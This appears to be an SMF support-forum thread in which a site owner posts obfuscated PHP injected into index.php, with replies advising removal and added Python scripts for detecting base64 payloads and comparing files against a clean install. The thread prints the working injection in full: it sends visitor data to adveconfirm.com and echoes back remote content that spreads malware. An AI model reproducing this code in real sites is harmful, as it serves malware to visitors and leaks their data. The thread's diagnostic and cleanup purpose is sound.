SMF Support > SMF 2.0.x Support

Obfuscated Code


XHIBIT911:
I found this code in my index.php.  Random people had been saying my site had some type of virus and this is after I had scanned on about 9 website checkers. It happens randomly and only AVG, Nortons and another security suite can detect it.


--- Code: ---// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
--- End code ---


So the other day when I went to Base64Decode : http://www.base64decode.org/

I entered the string that was in the code below:

--- Code: ---( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw')
--- End code ---

The URL it decoded was this: http://adveconfirm.com/stat/stat.php

I need to know: is it safe to find and remove all of this code from any files it's located in?
Or just how much of this code needs to go?


--- Code: ---// This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>
--- End code ---
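One way to triage an injected block like this, without trusting an online decoder, is to scan the file for base64_decode() literals, decode them locally, and flag any that turn into a URL or feed a network or execution call on a nearby line. The following is an added Python example (not SMF code and not from this thread); the function names are mine, and the sample input is a trimmed excerpt of the snippet posted above.

```python
import base64
import re

# Added example (not SMF code and not from the thread): flag base64_decode()
# literals that decode to a URL or feed a network/execution call.
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
SINKS = ("curl_init", "file_get_contents", "fopen", "eval", "include", "require",
         "system", "exec", "passthru")

def decode_literal(b64):
    """Return the decoded literal as text, or None if it is not printable ASCII."""
    try:
        text = base64.b64decode(b64, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def scan_php(source):
    """Return [(line_no, decoded_text, reasons)] for suspicious base64_decode() uses."""
    findings = []
    lines = source.splitlines()
    for idx, line in enumerate(lines, 1):
        for m in B64_CALL.finditer(line):
            decoded = decode_literal(m.group(1))
            reasons = []
            if decoded is None:
                reasons.append("non-text payload")
            elif re.match(r"https?://", decoded):
                reasons.append("decodes to URL")
            # Check this line and the next three for a sink; \b stops curl_exec( matching exec(.
            window = " ".join(lines[idx - 1:idx + 3])
            used_by = [s for s in SINKS if re.search(r"\b%s\s*\(" % s, window)]
            if used_by:
                reasons.append("feeds " + ", ".join(used_by))
            if reasons:
                findings.append((idx, decoded, reasons))
    return findings

# Constructed sample: a trimmed excerpt of the block posted in this thread.
SAMPLE_PHP = """<?php
// This code use for global bot statistic
$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
$stCurlHandle = curl_init( $stCurlLink );
$sResult = @curl_exec($stCurlHandle);
"""

if __name__ == "__main__":
    for line_no, decoded, reasons in scan_php(SAMPLE_PHP):
        print("line %d: %r (%s)" % (line_no, decoded, "; ".join(reasons)))
```

Run it over every .php file under the web root, not just index.php, since the same block is often dropped into several files.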

busterone:
I am not a developer, but I don't think that code is part of SMF. It either came from an unapproved mod that you installed or you have been hacked. The URL that the base64 code points to is a reported attack page. That could very well be where I got the "security scan" fake antivirus malware when I visited your site a few days ago.

XHIBIT911:
EXACTLY!

And when I did a whois check on that site they're hella shady.
As in very very very shady.
I'll post more about them in a sec... but how much of that code can I remove without destroying my site?

XHIBIT911:
And this is something I discovered about the website that is the cause of the malware and was base64'd on my website.


http://www.dslreports.com/forum/r25294235-Can-someone-check-out-this-site-

After doing a Google search and a whois I'm 1000% certain that this is where it stems from, because that's where the code, after it's debugged, tried to open. Here are Google results about the website:

https://www.google.com/#hl=en&gs_nf=1&tok=qvGXr_ZufaVukF2eBZMuHw&cp=15&gs_id=6j&xhr=t&q=adveconfirm.com&pf=p&safe=off&output=search&sclient=psy-ab&oq=adveconfirm.com&gs_l=&pbx=1&fp=1&biw=1024&bih=593&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&cad=b


Notice how many server and other changes this domain has had in the last year, like they're trying to cover their tracks.

http://whois.domaintools.com/adveconfirm.com

busterone:
Upon just a glance, none of that is SMF code. I just searched a fresh copy of index.php and none of that is in there. It may be from a mod that you have installed, or, as I said, you have been hacked. If it is from a mod, uninstall the mod and delete all of that code. If not, delete it anyway.
To be safe, it may even be a better idea to search all your files for any other files that are NOT part of an SMF install. They could be a way to get into your site.
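Checking against a fresh copy, as suggested above, can be done for the whole tree rather than one file: hash every file in a clean download of the same SMF version and in the live site, then report shipped files whose bytes changed and files the clean copy never had. The following is an added Python example, not SMF tooling; the directory layout and file contents are constructed stand-ins, and Settings.php is treated as a known local file that is reviewed by hand.

```python
import hashlib
import tempfile
from pathlib import Path

# Added example (not SMF's own tooling): diff a live forum against a fresh
# download of the same SMF version to find changed and foreign files.
# Files that legitimately differ on a live site; they are listed here so they
# get reviewed by hand instead of being reported as tampering.
EXPECTED_LOCAL = {"Settings.php", "Settings_bak.php"}

def hash_tree(root):
    """Map each file's root-relative POSIX path to its SHA-256 hex digest."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            digests[path.relative_to(root).as_posix()] = digest
    return digests

def compare_trees(clean_root, live_root):
    """Return (modified, extra): shipped files whose bytes changed, and files on
    the live site that the clean install does not contain."""
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    modified = sorted(p for p in live if p in clean and live[p] != clean[p])
    extra = sorted(p for p in live if p not in clean and p not in EXPECTED_LOCAL)
    return modified, extra

def build_demo():
    """Construct two tiny trees standing in for a fresh copy and the live site."""
    base = Path(tempfile.mkdtemp())
    clean, live = base / "clean", base / "live"
    for root in (clean, live):
        (root / "Sources").mkdir(parents=True)
        (root / "index.php").write_text("<?php\n// SMF entry point (constructed)\n")
        (root / "Sources" / "Load.php").write_text("<?php\n// loader (constructed)\n")
    # Live copy: an appended block in index.php and a file SMF never shipped.
    with (live / "index.php").open("a") as f:
        f.write("// This code use for global bot statistic\n$x = base64_decode('...');\n")
    (live / "Settings.php").write_text("<?php // site configuration (constructed)\n")
    (live / "Themes").mkdir()
    (live / "Themes" / "img.php").write_text("<?php // not part of SMF (constructed)\n")
    return clean, live

if __name__ == "__main__":
    modified, extra = compare_trees(*build_demo())
    print("modified:", modified)           # ['index.php']
    print("not in clean install:", extra)  # ['Themes/img.php']
```

On a real forum the clean tree must be the exact same SMF version and must include every mod you installed from a trusted package, otherwise mod edits show up as modifications.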
